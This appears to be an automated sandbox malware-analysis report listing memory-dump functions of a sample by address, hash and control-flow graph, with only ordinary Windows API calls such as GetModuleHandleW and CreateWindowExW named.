                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8baf659765b09d86b512d836d55afdf1e16319654c3d16abe66864f9bf8f90f4
                                                                                                                                                                                                                                        • Instruction ID: 913cc24c7d4c76342d33ad4591bd400b4a7a8eaaa319e1a234de46f1e23115ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8baf659765b09d86b512d836d55afdf1e16319654c3d16abe66864f9bf8f90f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95813374D22219DFCB18CFA5D9846AEBBF2BB88380F20902AD406BB354DB745A41CF55
                                                                                                                                                                                                                                        Function 0A2134D7 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4cceec2ca16b88910a970d85170b084143be8477513285803d2e6beb58d39db4
                                                                                                                                                                                                                                        • Instruction ID: 7d3b11d435d064fd89fcaf59347ce7d2d78f09e2dc903de7eb6f54d04fbbd2ae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cceec2ca16b88910a970d85170b084143be8477513285803d2e6beb58d39db4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1671F8B4E11208DFDB48DFA6D8855AEBFB2FF88345F60802AE45AA7354DB309945CF50
                                                                                                                                                                                                                                        Function 0A2134E8 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 44ce9f1d7ba98afc4f74d201af28d79568474c065e2e909846cd12f1f5c64b04
                                                                                                                                                                                                                                        • Instruction ID: d13b8635a13e86e82b089c8cdf69bea20e3e4dea3f37e69894fe25533029ab3e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44ce9f1d7ba98afc4f74d201af28d79568474c065e2e909846cd12f1f5c64b04
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D71F6B4E10208DFDB48DFA6D98559EBFB2FF88340F60842AE45AAB354DB309945CF50
                                                                                                                                                                                                                                        Function 073C4871 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f226ab01032f4f56692e3a750d6d263606d57efe7f02cb9fe884d43473131222
                                                                                                                                                                                                                                        • Instruction ID: 0e9e0e77545ff95a31af151b9072d821fa3fbec18baeedbcdd62388715d8f93c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f226ab01032f4f56692e3a750d6d263606d57efe7f02cb9fe884d43473131222
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48614AB4D0524ADFDB04CFAAD5806AEFFB2EF89300F14D42AD119A7214D7398A428F91
                                                                                                                                                                                                                                        Function 0A214E28 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d23c9c0774690ad2f95dbe38927c653b33375f5246dd073fb5cdff942edec80b
                                                                                                                                                                                                                                        • Instruction ID: 2f674e3969eea52b7dcbec83814449c22e6f0d0d784f927231c1f7bd7ef1b800
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d23c9c0774690ad2f95dbe38927c653b33375f5246dd073fb5cdff942edec80b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D56179B0D25219EFCB18DFA5C585AEEBBB5FF88340F10942AE45AA7240DB745A01CF94
                                                                                                                                                                                                                                        Function 0A214E19 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 13a6b5d26417d12a1e3cac7b35c27d26d64bc105d5a00cd78d4818d950abd71e
                                                                                                                                                                                                                                        • Instruction ID: 49d66c44d0f4a7d2a324e24c39cd575fb91ab9a2343b1bd1f7f835bac581e180
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13a6b5d26417d12a1e3cac7b35c27d26d64bc105d5a00cd78d4818d950abd71e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46518CB0D25219EFCB18DFA5C585AAEBBF1FF88341F10953AE01AA7250DB745A01CF85
                                                                                                                                                                                                                                        Function 073C3300 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d8df92a096e23f9637f9d546d2746ede8ee235a07117c0910e15f6f911dcb16d
                                                                                                                                                                                                                                        • Instruction ID: fc5cf2af3564997cfe5d6b0e27d80dba327a0a55fb39112da389e4cadc6b28e0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8df92a096e23f9637f9d546d2746ede8ee235a07117c0910e15f6f911dcb16d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA5188B0E11209DFDB09DFA5E4445AEFBB2FF89301F10C869D41AA7258DB399A02CF51
                                                                                                                                                                                                                                        Function 073C4898 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 87f9045ea652eb15eb03fe5fa616eb95caff72f9105687406cd26d15dbe1cbdc
                                                                                                                                                                                                                                        • Instruction ID: d85df65b0adbc65bc9d379173d2b89a6f7785bbef6ba4fcb4df21eae2577ae61
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87f9045ea652eb15eb03fe5fa616eb95caff72f9105687406cd26d15dbe1cbdc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 765147B4D0424ADFEB04CFAAD5806AEFFB6EF89300F149429D119B7214D7399A428F91
                                                                                                                                                                                                                                        Function 05E76C38 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4a73867bb5ca8039a2a3dbfda647e75955c8b0de01e38632f35b5f230dce0be0
                                                                                                                                                                                                                                        • Instruction ID: e9d4be470c4f3f1cd68fbd87f17017aa02e192bd1cdef925d7b9ed05304fe1b1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a73867bb5ca8039a2a3dbfda647e75955c8b0de01e38632f35b5f230dce0be0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D5117B4E15618DBCB08DFA5E9845DDFBB2FF89301F24A02AD446B7254EB389D01CB25
                                                                                                                                                                                                                                        Function 073C79F0 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3134112495f3d9dd29ed99270ce8b554e1c9e3327d478b3c406246786fe3189a
                                                                                                                                                                                                                                        • Instruction ID: b25a88c4279d4aafa4736766065927bd33eadde9606a178672b42119d9ee8477
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3134112495f3d9dd29ed99270ce8b554e1c9e3327d478b3c406246786fe3189a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64519AB4D11209DFEB08CFA5E8446AEBBB2FF89301F04946ED81AA7754DB385A01CF50
                                                                                                                                                                                                                                        Function 05E76C48 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: abc6f07f32d98f94179e6c595ebdaad8026bc438b1f58121fafc95f5c21db4df
                                                                                                                                                                                                                                        • Instruction ID: 80860757a11a4042bf6c17f2b89cadf5c3c40dc4f1e75ded48bbf1f0939000a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abc6f07f32d98f94179e6c595ebdaad8026bc438b1f58121fafc95f5c21db4df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 314125B4E15618DBCB08DFA6E9445DDFBB2FF89301F14A02AD406B7254EB389D018B25
                                                                                                                                                                                                                                        Function 00C3C6A8 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: eabbdb412b5a1247e6ddf9b1166ca84cb1d3019f9df3ec65cb2508cc3f8d28a0
                                                                                                                                                                                                                                        • Instruction ID: 2b43228cbdb1fb9d66e011711b0c0ebac371be43c3b6db43db8a479dc2659ebc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eabbdb412b5a1247e6ddf9b1166ca84cb1d3019f9df3ec65cb2508cc3f8d28a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51D475E002588FDB18DFAAC841B9DBBB2FF89300F20C16AD819AB355DB315946DF50
                                                                                                                                                                                                                                        Function 0A210B71 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e01b4279b7b6a46a0ce74b0d2a37f20df7595a1342e3d8e46e48dff7eaf1723e
                                                                                                                                                                                                                                        • Instruction ID: e8e6da5339fddafa31aa86d36a0f7707c7c7d380a81c060c1f30a6ba421654b3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01b4279b7b6a46a0ce74b0d2a37f20df7595a1342e3d8e46e48dff7eaf1723e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1519871E146588FDB58CF6B8D4579AFBF3AFC9200F14C1BAD44CAA225DB301A858F51
                                                                                                                                                                                                                                        Function 0A210BA0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 370be563b0b6a2a43a407637a427f8886acbabee2b1c095e05265895808d016b
                                                                                                                                                                                                                                        • Instruction ID: c3f0ea4eda15823b58ec2622870a2b8ce158b899cd7fdfcd886d16265bde8a14
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 370be563b0b6a2a43a407637a427f8886acbabee2b1c095e05265895808d016b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37514871E10619CBDB68CF6BCD4579AFAF3AFC8200F14C1BA954DA6264DB301A858F51
                                                                                                                                                                                                                                        Function 0562D148 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D1D6
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0562D213
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D250
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0562D2A9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 087a057394c8df2293f4f6949b53b2931b52f9a40cd39abbba4902b3e4278000
                                                                                                                                                                                                                                        • Instruction ID: c794bfc4071a34074012d2652aa3812a0f614fbb0e3f54ec13395607a789b709
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 087a057394c8df2293f4f6949b53b2931b52f9a40cd39abbba4902b3e4278000
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 125174B190170A8FDB14DFAAD548B9EBBF1FB88314F20C419E409A7390DB389985CF65
                                                                                                                                                                                                                                        Function 0562D158 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D1D6
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0562D213
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0562D250
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0562D2A9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                                                                                        • Opcode ID: 2817ce711089466cd31900ffa2e4ce3157e7353d7b2c2a364322371784cc4577
                                                                                                                                                                                                                                        • Instruction ID: bf977f4ff26f71b6ba38ff46a91e50c1ce972f736d05ef2847025bba3a1b6993
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2817ce711089466cd31900ffa2e4ce3157e7353d7b2c2a364322371784cc4577
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F45153B190170A8FDB14DFAAD548B9EBBF1BB88314F20C059E409A73A0DB349985CF65
                                                                                                                                                                                                                                        Function 05E50040 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 313 5e50040-5e50057 315 5e50059-5e50068 313->315 316 5e500ba-5e500c8 313->316 315->316 319 5e5006a-5e50076 315->319 320 5e500db-5e500dd 316->320 321 5e500ca-5e500d5 316->321 325 5e50078-5e50084 319->325 326 5e5008a-5e500a6 319->326 422 5e500df call 5e503e6 320->422 423 5e500df call 5e50006 320->423 424 5e500df call 5e50040 320->424 425 5e500df call 5e503be 320->425 321->320 327 5e5019a-5e50212 321->327 322 5e500e5-5e500f4 331 5e500f6-5e50105 322->331 332 5e5010c-5e5010f 322->332 325->326 334 5e50110-5e5014e 325->334 338 5e50155-5e50193 326->338 339 5e500ac-5e500b0 326->339 353 5e50214-5e5021a 327->353 354 5e5021b-5e50225 327->354 331->332 334->338 338->327 339->316 357 5e50461-5e5048d 354->357 358 5e5022b-5e50244 354->358 363 5e50494-5e504d0 357->363 358->363 364 5e5024a-5e5026c 358->364 382 5e504d2-5e504ed 363->382 383 5e5050a-5e50548 363->383 371 5e5027d-5e5028c 364->371 372 5e5026e-5e5027c 364->372 376 5e502b1-5e502d2 371->376 377 5e5028e-5e502ab 371->377 389 5e502d4-5e502e5 376->389 390 5e50322-5e5034a 376->390 377->376 387 5e5055f-5e50585 GetCurrentThreadId 383->387 388 5e5054a-5e5055d 383->388 391 5e50587-5e5058d 387->391 392 5e5058e 387->392 393 5e50595-5e505a2 388->393 398 5e50314-5e50318 389->398 399 5e502e7-5e502ff 389->399 418 5e5034d call 5e50780 390->418 419 5e5034d call 5e50770 390->419 420 5e5034d call 5e73548 390->420 421 5e5034d call 5e73558 390->421 391->392 392->393 398->390 406 5e50304-5e50312 399->406 407 5e50301-5e50302 399->407 403 5e50350-5e50375 409 5e50377-5e5038c 403->409 410 5e503bb 403->410 406->398 406->399 407->406 409->410 413 5e5038e-5e503b1 409->413 410->357 413->410 417 5e503b3 413->417 417->410 418->403 419->403 420->403 421->403 422->322 423->322 424->322 425->322
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488232394.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e50000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c79d3465efbab91562234725256f038a7b2eefafaa5dbf6466a26048b3f7b013
                                                                                                                                                                                                                                        • Instruction ID: 4ba81fb4ee502684ad20f63e5d997f49b9dc736258b1d3be9fcd5b4d3f23c16c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c79d3465efbab91562234725256f038a7b2eefafaa5dbf6466a26048b3f7b013
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFD16E31B006148FEB14EBB8C559AAE77F6FFC8714B148469E846AB390CB35EC41CB65
                                                                                                                                                                                                                                        Function 0562AED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 426 562aed0-562aedf 427 562aee1-562aeee call 562a8bc 426->427 428 562af0b-562af0f 426->428 434 562aef0 427->434 435 562af04 427->435 430 562af23-562af64 428->430 431 562af11-562af1b 428->431 437 562af71-562af7f 430->437 438 562af66-562af6e 430->438 431->430 484 562aef6 call 562b168 434->484 485 562aef6 call 562b158 434->485 435->428 439 562afa3-562afa5 437->439 440 562af81-562af86 437->440 438->437 445 562afa8-562afaf 439->445 442 562af91 440->442 443 562af88-562af8f call 562a8c8 440->443 441 562aefc-562aefe 441->435 444 562b040-562b100 441->444 447 562af93-562afa1 442->447 443->447 477 562b102-562b105 444->477 478 562b108-562b133 GetModuleHandleW 444->478 448 562afb1-562afb9 445->448 449 562afbc-562afc3 445->449 447->445 448->449 451 562afd0-562afd9 call 562a8d8 449->451 452 562afc5-562afcd 449->452 457 562afe6-562afeb 451->457 458 562afdb-562afe3 451->458 452->451 460 562b009-562b00d 457->460 461 562afed-562aff4 457->461 458->457 482 562b010 call 562b468 460->482 483 562b010 call 562b458 460->483 461->460 462 562aff6-562b006 call 562a8e8 call 562a8f8 461->462 462->460 465 562b013-562b016 467 562b018-562b036 465->467 468 562b039-562b03f 465->468 467->468 477->478 479 562b135-562b13b 478->479 480 562b13c-562b150 478->480 479->480 482->465 483->465 484->441 485->441
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0562B126
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                        • Opcode ID: ca4dc5006d0b5faa8e9ba6810629d9ca0ea04417904ec53ac7c9d1eef66cff12
                                                                                                                                                                                                                                        • Instruction ID: 871df991c614507242eb0cf0c2e7bc991c5c43cc58a1e95f4f3188ed9c733bed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca4dc5006d0b5faa8e9ba6810629d9ca0ea04417904ec53ac7c9d1eef66cff12
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E47115B0A04B158FD724DF6AD44575ABBF2FF88200F008A2DE44A97B50D7B9E845CF91
                                                                                                                                                                                                                                        Function 05A21CED Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 508 5a21ced-5a21d5e 509 5a21d60-5a21d66 508->509 510 5a21d69-5a21d70 508->510 509->510 511 5a21d72-5a21d78 510->511 512 5a21d7b-5a21db3 510->512 511->512 513 5a21dbb-5a21e1a CreateWindowExW 512->513 514 5a21e23-5a21e5b 513->514 515 5a21e1c-5a21e22 513->515 519 5a21e68 514->519 520 5a21e5d-5a21e60 514->520 515->514 521 5a21e69 519->521 520->519 521->521
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A21E0A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                                                                                                        • Opcode ID: 54e0ef0ba250c506b6bcd4eb9205f8bfee4a5fa53922c5abdc53cd68a760c784
                                                                                                                                                                                                                                        • Instruction ID: a9405c2ba3d6c253bd07c54c24b2fee89c910b343e38b777f987f03eca83ac84
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54e0ef0ba250c506b6bcd4eb9205f8bfee4a5fa53922c5abdc53cd68a760c784
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9251C0B1D00319EFDF14CFA9D885ADEBBB5BF48310F64812AE819AB210D7759945CF90
                                                                                                                                                                                                                                        Function 05A21CF8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 522 5a21cf8-5a21d5e 523 5a21d60-5a21d66 522->523 524 5a21d69-5a21d70 522->524 523->524 525 5a21d72-5a21d78 524->525 526 5a21d7b-5a21e1a CreateWindowExW 524->526 525->526 528 5a21e23-5a21e5b 526->528 529 5a21e1c-5a21e22 526->529 533 5a21e68 528->533 534 5a21e5d-5a21e60 528->534 529->528 535 5a21e69 533->535 534->533 535->535
                                                                                                                                                                                                                                        APIs
